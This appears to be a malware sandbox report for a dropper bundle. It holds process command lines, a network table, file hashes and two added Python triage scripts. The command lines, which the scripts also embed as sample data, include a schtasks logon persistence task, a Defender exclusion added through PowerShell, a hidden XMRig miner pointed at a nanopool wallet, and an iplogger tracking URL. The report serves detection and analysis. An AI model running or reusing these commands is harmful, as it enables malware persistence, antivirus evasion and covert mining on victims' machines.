C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 1056

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe383c46f8,0x7ffe383c4708,0x7ffe383c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
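
Several of the command lines above carry the behaviours the signatures summarise: the schtasks logon task with /rl highest pointing at a services64.exe in Roaming, the Add-MpPreference exclusion for 1cr.exe, an XMRig argument set (--algo=rx/0, --url=...:14433, --tls, --cinit-stealth) hosted in a process whose image is C:\Windows\explorer.exe, an image path (winnetdriv.exe) that does not match the executable named on its own command line, and Edge being pointed at iplogger.org. The script below is an added example, not code from the sandbox, that encodes those five checks as rules over (image path, command line) pairs and runs them on lines transcribed from this list. The watchlists and the miner flag set are assumptions chosen for this report; the miner line is abridged and its wallet string shortened.

```python
from ntpath import basename

# Constructed sample: (image path, command line) pairs transcribed from the
# Processes list above. The explorer.exe line is abridged and the --user value
# shortened; in practice these fields come from the sandbox's structured export.
SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\cmd.exe",
     r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit'''),
    (r"C:\Windows\system32\schtasks.exe",
     r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'"""),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"'''),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --randomx-mode=auto --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLg.main/password --pass= --cpu-max-threads-hint=30 --tls --cinit-stealth"),
    (r"C:\Windows\winnetdriv.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe"),
    (r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7'),
]

# Assumed watchlists for this example, seeded from what this report shows.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\")
MINER_FLAGS = ("--algo=", "--url=", "--randomx", "--cinit-stealth", "--donate-level")
TRACKING_HOSTS = ("iplogger.org", "ipinfo.io", "db-ip.com")


def first_token(cmdline):
    """Executable named by the command line: a quoted path, else up to the first space."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def triage(image, cmdline):
    """Rule names that fire for one (image, command line) pair, in rule order."""
    findings = []
    low = cmdline.lower()
    # 1. Binary on disk is not the one the command line names: a renamed copy or a
    #    hollowed image (winnetdriv.exe running as setup.exe in this report).
    named = basename(first_token(cmdline)).lower()
    if named.endswith(".exe") and named != basename(image).lower():
        findings.append("image_cmdline_mismatch")
    # 2. Logon task, highest run level, action inside a user-writable directory.
    if ("schtasks" in low and "/create" in low and "/sc onlogon" in low
            and "/rl highest" in low and any(d in low for d in USER_WRITABLE)):
        findings.append("schtasks_logon_highest_userdir")
    # 3. Defender exclusion added for a payload path.
    if "add-mppreference" in low and "-exclusionpath" in low:
        findings.append("defender_exclusion")
    # 4. Two or more XMRig-style flags; worse when the host image is a Windows binary.
    if sum(f in low for f in MINER_FLAGS) >= 2:
        findings.append("xmrig_args")
        if image.lower().startswith(TRUSTED_DIRS):
            findings.append("miner_in_system_binary")
    # 5. A URL on an IP-logging / geolocation service handed to a browser.
    if "http" in low and any(h in low for h in TRACKING_HOSTS):
        findings.append("tracking_url")
    return findings


def triage_all(processes):
    return [triage(img, cmd) for img, cmd in processes]


if __name__ == "__main__":
    for (img, _), hits in zip(SAMPLE_PROCESSES, triage_all(SAMPLE_PROCESSES)):
        print(f"{basename(img):<16} {', '.join(hits) or '-'}")
```

Rule 1 compares basenames rather than full paths on purpose: the sandbox records cmd.exe and powershell.exe under SysWOW64 while their command lines say System32, which is WoW64 redirection, not masquerading, and a full-path comparison would flag every 32-bit process. The plain `cmd.exe /c 6f1aa71747b4a291.exe` line produces no finding, which is the expected result for a rule set that keys on behaviour rather than on the fact that something ran from %TEMP%.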

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.28.25:80 www.maxmind.com tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.5.26.104.in-addr.arpa udp
US 8.8.8.8:53 15.4.26.104.in-addr.arpa udp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 25.28.17.104.in-addr.arpa udp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 74.114.154.18:443 lenak513.tumblr.com tcp
N/A 127.0.0.1:54195 tcp
N/A 127.0.0.1:54197 tcp
US 8.8.8.8:53 18.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.11.8:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 live.goatgame.live udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 live.goatgame.live udp
NL 51.15.89.13:14433 xmr-eu2.nanopool.org tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
DE 51.89.23.91:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
SG 37.0.10.236:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 live.goatgame.live udp
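
Read as a whole, the Network table separates into a few groups: one raw-IP TCP endpoint with no DNS name contacted over and over (45.142.213.135:30058), two mining-pool connections on port 14433, a run of geolocation / IP-logging lookups (ipinfo.io, api.db-ip.com, www.maxmind.com, iplogger.org), fetches from public hosting (cdn.discordapp.com, raw.githubusercontent.com, pastebin.com), and a name (live.goatgame.live) that is queried many times but never answered with a connection. The script below is an added example, not the sandbox's own code, that parses rows in this table's "Country Destination Domain Proto" layout and computes those groups from a subset of the rows embedded as a constructed sample. The watchlists and the pool-port set are assumptions seeded from this report, not a vendor feed.

```python
import ipaddress
from collections import Counter

# Constructed sample: a subset of rows from the Network table above, in the
# report's layout. The Domain column is absent for raw-IP connections.
SAMPLE_NETWORK = """
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.db-ip.com udp
US 104.26.4.15:443 api.db-ip.com tcp
US 104.17.28.25:80 www.maxmind.com tcp
US 104.26.2.46:443 iplogger.org tcp
GB 37.0.8.235:80 tcp
LV 45.142.213.135:30058 tcp
SG 37.0.10.236:80 tcp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 live.goatgame.live udp
LV 45.142.213.135:30058 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.89.13:14433 xmr-eu2.nanopool.org tcp
LV 45.142.213.135:30058 tcp
DE 51.89.23.91:14433 xmr-eu1.nanopool.org tcp
SG 37.0.10.236:80 tcp
N/A 127.0.0.1:54195 tcp
N/A 224.0.0.251:5353 udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
"""

# Assumed watchlists for this example, seeded from the domains and ports this
# report itself shows (14433 is the nanopool TLS port seen above).
GEO_LOOKUP = {"ipinfo.io", "db-ip.com", "api.db-ip.com", "www.maxmind.com", "iplogger.org"}
PUBLIC_HOSTING = {"cdn.discordapp.com", "raw.githubusercontent.com", "github.com", "pastebin.com"}
POOL_PORTS = {14433, 3333, 5555, 7777}


def parse_network(text):
    """Rows as dicts; an absent Domain column yields an empty string."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) == 3:              # Country Destination Proto
            f.insert(2, "")
        if len(f) != 4:
            continue
        ip, port = f[1].rsplit(":", 1)
        rows.append({"country": f[0], "ip": ip, "port": int(port),
                     "domain": f[2], "proto": f[3]})
    return rows


def is_local(ip):
    a = ipaddress.ip_address(ip)
    return a.is_private or a.is_loopback or a.is_multicast or a.is_link_local


def unresolved_tcp(rows):
    """Raw-IP TCP endpoints with no DNS name, counted: the repeat offender is the C2 candidate."""
    return Counter(f"{r['ip']}:{r['port']}" for r in rows
                   if r["proto"] == "tcp" and not r["domain"] and not is_local(r["ip"]))


def pool_contacts(rows):
    """TCP rows to a mining pool, by name or by a well-known pool port."""
    return [f"{r['domain'] or r['ip']}:{r['port']}" for r in rows
            if r["proto"] == "tcp" and ("pool" in r["domain"] or r["port"] in POOL_PORTS)]


def queried_never_connected(rows):
    """Names resolved over DNS that never appear in a TCP row: dead or sinkholed infrastructure.
    Reverse (in-addr.arpa) lookups are the sandbox's own and are ignored."""
    looked_up = {r["domain"] for r in rows
                 if r["proto"] == "udp" and r["port"] == 53
                 and r["domain"] and not r["domain"].endswith(".arpa")}
    reached = {r["domain"] for r in rows if r["proto"] == "tcp"}
    return sorted(looked_up - reached)


def by_watchlist(rows, names):
    return sorted({r["domain"] for r in rows if r["proto"] == "tcp" and r["domain"] in names})


if __name__ == "__main__":
    rows = parse_network(SAMPLE_NETWORK)
    print("C2 candidate:", unresolved_tcp(rows).most_common(1))
    print("mining pools:", pool_contacts(rows))
    print("geo/IP lookups:", by_watchlist(rows, GEO_LOOKUP))
    print("public hosting:", by_watchlist(rows, PUBLIC_HOSTING))
    print("queried, never reached:", queried_never_connected(rows))
```

Loopback and multicast rows (127.0.0.1, 224.0.0.251) are filtered before counting so that local browser traffic does not outrank the real endpoint, and the reverse-DNS rows the sandbox generates for every IP are excluded from the dead-name check; without that filter every in-addr.arpa entry would show up as "queried, never reached". The full table has the same shape as the sample, only with more repeats of the 45.142.213.135:30058 and live.goatgame.live rows.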

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 3394285ab7e1ef48bc775f71ed7b0a76
SHA1 646fadf1a0a0dafe07319c86de0587ed96a0fc2b
SHA256 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467
SHA512 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe

MD5 68a59b521798b22a72d30dd7ff6eb04a
SHA1 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da
SHA256 e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc
SHA512 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/3744-45-0x0000000001420000-0x00000000014AF000-memory.dmp

memory/3744-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-48-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3744-56-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3744-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe

MD5 80cf471e52dcc848d81092439489f12f
SHA1 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5
SHA256 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f
SHA512 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe

MD5 079d742f6fc3fcc2eca352a1537e5103
SHA1 d904d7432a367ad078c99c281b67705e7332496a
SHA256 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39
SHA512 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe

MD5 13a289feeb15827860a55bbc5e5d498f
SHA1 e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad
SHA256 c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775
SHA512 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

MD5 ef5fa848e94c287b76178579cf9b4ad0
SHA1 560215a7c4c3f1095f0a9fb24e2df52d50de0237
SHA256 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c
SHA512 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

memory/4872-112-0x00000000005C0000-0x00000000005EC000-memory.dmp

memory/3888-111-0x0000000000350000-0x000000000043E000-memory.dmp

memory/4872-115-0x0000000000C90000-0x0000000000CB0000-memory.dmp

memory/4948-116-0x0000000000590000-0x00000000006D2000-memory.dmp

memory/4872-113-0x0000000000C80000-0x0000000000C86000-memory.dmp

memory/4948-118-0x0000000005480000-0x0000000005A24000-memory.dmp

memory/4948-119-0x0000000004F80000-0x0000000005012000-memory.dmp

memory/4872-117-0x0000000000CB0000-0x0000000000CB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe

MD5 7e06ee9bf79e2861433d6d2b8ff4694d
SHA1 28de30147de38f968958e91770e69ceb33e35eb5
SHA256 e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f
SHA512 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe

MD5 0965da18bfbf19bafb1c414882e19081
SHA1 e4556bac206f74d3a3d3f637e594507c30707240
SHA256 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff
SHA512 fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b

memory/3984-94-0x0000000000010000-0x0000000000018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe

MD5 3f9f7dfccefb41726d6b99e434155467
SHA1 f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1
SHA256 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34
SHA512 e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe

MD5 2b32e3fb6d4deb5e9f825f9c9f0c75a6
SHA1 2049fdbbe5b72ff06a7746b57582c9faa6186146
SHA256 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2
SHA512 ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa

C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe

MD5 5866ab1fae31526ed81bfbdf95220190
SHA1 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f
